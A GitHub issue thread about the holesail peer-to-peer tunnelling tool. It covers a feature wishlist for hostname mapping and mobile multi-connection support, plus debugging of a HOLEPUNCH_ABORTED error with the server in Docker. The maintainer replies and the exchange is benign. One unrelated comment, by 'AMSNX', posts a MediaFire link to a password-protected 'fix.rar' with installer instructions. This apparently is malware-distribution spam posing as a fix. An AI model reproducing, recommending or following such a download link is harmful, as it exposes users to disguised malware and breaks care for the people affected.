### ISSUE TITLE
The dream

### ISSUE THREAD

**Issue by dipunm** [holesail/holesail#16]
I suspect that this is on your roadmap already but incase not, here is a wishlist that would make this tool :chefs-kiss: perfect:

1. Ability to configure a hostname instead of a port (and map 443 and/or 80 optionally) when connecting with a client.
2. Ability to connect to multiple connection strings on mobile app.

My usecase is creating a truly private NextCloud instance. I would share the connection string with my family, ask them to install the nextcloud app, the holesail app, and it would: 

1. configure a url like `cloud.mywebsite.xyz` to point to `localhost`.
2. Set up a reverse proxy so that calls to the hostname `cloud.mywebsite.xyz` get forwarded to the connected service.

My server would take a call to that connection string and forward it to `cloud.mywebsite.xyz:443` which has an IP of 127.0.0.1 (i.e. to itself) and since I own the domain, I can issue a valid SSL certificate.

If I have this correct, then this gives me a private connection to NextCloud and all traffic is secured by SSL without any middlemen getting access to the data being sent.

Now I suspect that this is going to be a problem for the following reasons:

1. Binding to port 443 or 80 is probably going to need special permissions. Possibly then we can use a random port, and hopefully this should still work.
2. Configuring a host to point to 127.0.0.1 on a client, especially on mobile (android/ios) may need special permissions. I don't know, I am hoping that is not the case.

Curious if this is something you'd be interested in developing towards and/or if you already know about problems with this idea.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by supersuryaansh** [comment]
1. Hi, the hostname is already supported on both the client and server-side with the --host flag.
2. "Ability to connect to multiple connection strings on the mobile app." -> It is a planned feature, we will work on next month.
3. You can expose your hostname while working with the server and the client side won't need to configure it separately.

For example, while setting a port live, you can do --host cloud.mywebsite.xyz, and when the client connects to the connection string, they can access the same on 127.0.0.1 or whatever you set.

Your setup is possible without any changes to holesail.

**Comment by dipunm** [comment]
I am using Android for the client side, so I think not possible? If I set the --host on the server, it is still 127.0.0.1 (or localhost) on the client right?

If so, that is cool. If not, then using 127.0.0.1 would mean that either my SSL certificate should support that (will see if this is possible via letsencrypt actually) or it will not match the domain name and the application I am using will reject the URL.

**Comment by dipunm** [comment]
It appears that I can't generate a valid certificate for localhost or 127.0.0.1 https://letsencrypt.org/docs/certificates-for-localhost/

Although I am not sure if I understand the MitM attack for certificates pointing to localhost...


If I understand correctly, I can create a DNS record pointing to 127.0.0.1 and certify it with Let's Encrypt, and because the certificate is not coming from an app, but is instead coming from a remote server, this is still secure. Do I understand that right?

**Comment by dipunm** [comment]
I'll play with this and see if I can get it working: :eyes: ... Amazing.

**Comment by supersuryaansh** [comment]
@dipunm Let me know how it goes for you, I will close the issue then.

**Comment by dipunm** [comment]
FYI, I have been pulling my hair out testing, trying to get logs, at this point I feel pretty familiar with how this library works, but I was facing an issue which I think is this one: https://github.com/holepunchto/hyperdht/issues/112

I am considering to make a pull request for a `--debug` mode which will output logs, expose errors, etc. I am not sure where errors are being suppressed right now, but when I was looking for errors, running a custom script that I made, I was able to see it throw exceptions when it couldn't connect. This for sure would be a useful feature, for it to throw and not silently pass. Maybe a `--strict` mode or something to ensure it fails if it cannot immediately connect.

**Comment by supersuryaansh** [comment]
@dipunm Can you tell me what part are you facing an issue with? The errors are not being suppressed anywhere, but if you do want to create a PR for --debug, you should do it in holesail-server/holesail-client

**Comment by dipunm** [comment]
I think my issue is that running a server inside a docker container makes it hard/impossible to connect to.

I think the server side gets no logs because it never connects, and the client, well here is my client code and the error that I found that helped lead me to the hyperDHT github issue (I was actually going to file an issue there and saw it).

```nodejs
const DHT = require('hyperdht');

const node = new DHT();
const pk = Buffer.from('e1b9574d06ad0609bc8d39b7fcc416ea119b4479eb6f5d895dec42a5d5ccc199', 'hex');

node.on('connection', (stream) => { console.log('CONNECTION!'); });

const socket = node.connect(pk);
socket.on('open', () => console.log('Connected to server'));
```

```bash
ssl-tunnel-holesail-test ⟩ node dht-client.js
node:events:496
      throw er; // Unhandled 'error' event
      ^

DHTError: HOLEPUNCH_ABORTED: Holepunch aborted
    at holepunch (/home/.../Projects/tmp/ssl-tunnel-holesail-test/node_modules/hyperdht/lib/connect.js:247:40)
    at async connectAndHolepunch (/home/.../Projects/tmp/ssl-tunnel-holesail-test/node_modules/hyperdht/lib/connect.js:195:3)
Emitted 'error' event on NoiseSecretStream instance at:
    at ReadableState.afterDestroy (/home/.../Projects/tmp/ssl-tunnel-holesail-test/node_modules/streamx/index.js:503:19)
    at NoiseSecretStream._destroy (/home/.../Projects/tmp/ssl-tunnel-holesail-test/node_modules/@hyperswarm/secret-stream/index.js:499:5)
    at ReadableState.updateNonPrimary (/home/.../Projects/tmp/ssl-tunnel-holesail-test/node_modules/streamx/index.js:396:16)
    at ReadableState.update (/home/.../Projects/tmp/ssl-tunnel-holesail-test/node_modules/streamx/index.js:377:71)
    at ReadableState.updateReadNT (/home/.../Projects/tmp/ssl-tunnel-holesail-test/node_modules/streamx/index.js:546:10)
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'HOLEPUNCH_ABORTED'
}

Node.js v20.11.0
```

The public key that I was connecting to was the correct one given by the server and this code worked well when I hosted the server on my local laptop. It just failed when running the server from docker.

I also noted that if I had typed in a random `pk` that didn't have a server listening, I would get a different error: `DHTError: PEER_NOT_FOUND: Peer not found`.

**Comment by supersuryaansh** [comment]
@dipunm I am not sure about the errors you have mentioned here but holesail runs in a passive mode. That is client and server can start/stop at any time and it will not generate any error even if the connection string does not exist yet.

When the connection string exists in future, the client will pick it up and works well. 

Your issue is likely related to docker config itself.

Someone created docker images for holesail that you can try:

https://github.com/anaxios/holesail-docker
https://github.com/anaxios/holesail-sidecar

**Comment by dipunm** [comment]
I'm going to close this issue. FYI, I couldn't connect to the holesail server when running it inside a docker container running on alpine linux running on proxmox.

I have found a way to get what I wanted to work though, and to make it work, I am running holesail on Alpine linux natively using https://github.com/holesail/holesail/issues/2.

Buuuut. I am about to open a new issue :smile:

**Comment by supersuryaansh** [comment]
@dipunm Glad that it worked out either way 😄
